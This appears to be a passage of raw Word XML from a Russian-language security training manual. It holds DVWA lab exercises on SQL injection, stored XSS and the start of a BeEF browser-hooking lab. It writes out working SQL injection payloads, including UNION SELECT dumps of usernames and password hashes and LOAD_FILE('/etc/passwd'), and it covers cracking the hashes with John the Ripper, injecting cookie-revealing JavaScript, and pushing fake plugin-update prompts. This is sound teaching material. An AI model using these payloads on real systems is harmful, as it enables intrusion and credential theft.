      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>оффлайн</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-подбора паролей. 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Задание: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п</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ровести эксплуатацию SQL-инъекции в DVWA (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Low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level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of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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>);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и</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">спользуя уязвимость, выгрузить имена пользователей и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хеши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паролей пользователей базы данных;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и</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">спользуя </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хеши</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> паролей, подобрать пароли с помощью утилиты </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>john-the-ripper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EF49CB"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1. Создать базу данных и установить низкий уровень безопасности.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24D107C" wp14:editId="317E281C">
            <wp:extent cx="5940115" cy="2082800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33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38A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D20C558" wp14:editId="7D3F9064">
            <wp:extent cx="5943600" cy="1623060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="386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58"/>
                    <a:srcRect b="515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38AB" w:rsidRDefault="00A638AB">
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00A638AB">
      <w:r w:rsidRPr="00EF49CB">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Шаг 2. Проверить, что форма по номеру </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:t xml:space="preserve"> выдает имя пользователя.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B8D4D53" wp14:editId="76DC744B">
            <wp:extent cx="5940115" cy="1587500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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3. Проверить уязвимость формы, введя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 xml:space="preserve">%' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> '0'='0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49A69BF" wp14:editId="72D793F5">
            <wp:extent cx="5940115" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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4. Вывести версию базы данных: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 xml:space="preserve">%' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0=0 UNION SELECT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>() #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65FA96D3" wp14:editId="5978FA63">
            <wp:extent cx="5940115" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="370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5. Вывести имя пользователя базы данных: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 xml:space="preserve">%' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0=0 UNION SELECT NULL, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>() #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3C646CA" wp14:editId="28968295">
            <wp:extent cx="5940115" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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6. Вывести на экран содержимое таблицы пользователей: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 xml:space="preserve">%' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union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select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null</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(first_name,0x0a,last_name,0x0a,user,0x0a,password) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>from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users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> #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D1908EB" wp14:editId="447812D6">
            <wp:extent cx="5940115" cy="3644900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29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7. Создать файлы с именами учетных записей и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хешами</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> паролей.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B778641" wp14:editId="33666D3E">
            <wp:extent cx="5940115" cy="3822700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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8. Осуществить подбор </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>хешей</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>john-the-ripper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3559289" wp14:editId="44E36756">
            <wp:extent cx="5940115" cy="2501900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26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>Шаг 9. Выгрузить содержимое файла /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etc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passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> с помощью команды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 xml:space="preserve">%' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ALL SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>null,LOAD_FILE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>('/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>passwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>') #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5FAF906" wp14:editId="48303EC2">
            <wp:extent cx="5940115" cy="5778500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27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7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b w:val="0"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc107507621"/>
      <w:bookmarkStart w:id="42" w:name="_Toc107513740"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Лабораторная работа № 5.5. Эксплуатация XSS-уязвимости</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42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изучить принцип эксплуатации XSS-уязвимости.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Задание:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00401AC4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>
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>п</w:t>
      </w:r>
      <w:r w:rsidR="00EF49CB" w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ровести эксплуатацию XSS-уязвимости в DVWA.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1. Разместить в сообщении </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>выводящий</w:t>
      </w:r>
      <w:proofErr w:type="gram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cookies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2787FFB" wp14:editId="63D28005">
            <wp:extent cx="5940115" cy="1384300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23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40EE7887" wp14:editId="1792AFA8">
            <wp:extent cx="5940115" cy="1765300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="319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2. Проверьте, что сообщение выводится каждый раз, как заходите на сайт.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368C384" wp14:editId="152181F0">
            <wp:extent cx="5940115" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="387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</w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="43" w:name="_Toc107507622"/>
    <w:bookmarkStart w:id="44" w:name="_Toc107513741"/>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_31"/>
          <w:id w:val="1219554508"/>
        </w:sdtPr>
        <w:sdtContent/>
      </w:sdt>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:t xml:space="preserve">Раздел 6. Атаки на </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:t>клиентское</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc107507623"/>
      <w:bookmarkStart w:id="46" w:name="_Toc107513742"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Лабораторная работа № 6.1. Захват браузера с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BeeF</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:bookmarkEnd w:id="46"/>
      <w:proofErr w:type="spellEnd"/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Цель:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> изучить базовый функционал </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>фреймворка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BeeF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. 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 xml:space="preserve">Задание: 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с помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BeeF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захватить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браузер пользователя на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00401AC4">
      <w:pPr>
        <w:pStyle w:val="a5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1134" w:hanging="426"/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вызвать в браузере клиента появление сообщения о необходимости обновления плагина.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00EF49CB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:b/>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Решение:</w:t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sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_32"/>
          <w:id w:val="-1310320726"/>
        </w:sdtPr>
        <w:sdtContent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Шаг 1. Запустить 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BeeF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framework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(Главное меню → 08 -Эксплуатация уязвимостей → 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beef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xss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 xml:space="preserve"> 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framework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) и получить доступ к консоли управления (</w:t>
          </w:r>
          <w:proofErr w:type="spellStart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beef:beef</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidRPr="00EF49CB">
            <w:rPr>
              <w:rFonts w:ascii="Gungsuh" w:eastAsia="Gungsuh" w:hAnsi="Gungsuh" w:cs="Gungsuh"/>
              <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>).</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="00EF49CB" w:rsidRPr="00EF49CB" w:rsidRDefault="00EF49CB" w:rsidP="00A638AB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0511BED6" wp14:editId="14D2B844">
            <wp:extent cx="5190840" cy="2379134"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="381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 rotWithShape="1">
                    <a:blip r:embed="rId170"/>
                    <a:srcRect b="13906"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5187801" cy="237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2. В </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> открыть браузер и перейти по адресу </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://192.168.56.109:3000/demos/butcher/index.html</w:t>
      </w:r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sdt>
        <w:sdtPr>
          <w:rPr>
            <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          </w:rPr>
          <w:tag w:val="goog_rdk_33"/>
          <w:id w:val="619808451"/>
        </w:sdtPr>
        <w:sdtContent/>
      </w:sdt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5B96D8A7" wp14:editId="450260F9">
            <wp:extent cx="4428066" cy="2531533"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="368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 rotWithShape="1">
                    <a:blip r:embed="rId171"/>
                    <a:srcRect b="11163"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4428066" cy="253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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Шаг 3. Удостовериться, что </w:t>
      </w:r>
      <w:r w:rsidR="00A638AB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>цель</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF49CB">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступна для атаки.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906F371" wp14:editId="3AB5FECF">
            <wp:extent cx="5940115" cy="1689100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28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 xml:space="preserve">Шаг 4. Выбрать и запустить команду </w:t>
      </w:r>
      <w:r w:rsidR="00401AC4">
        <w:rPr>
          <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
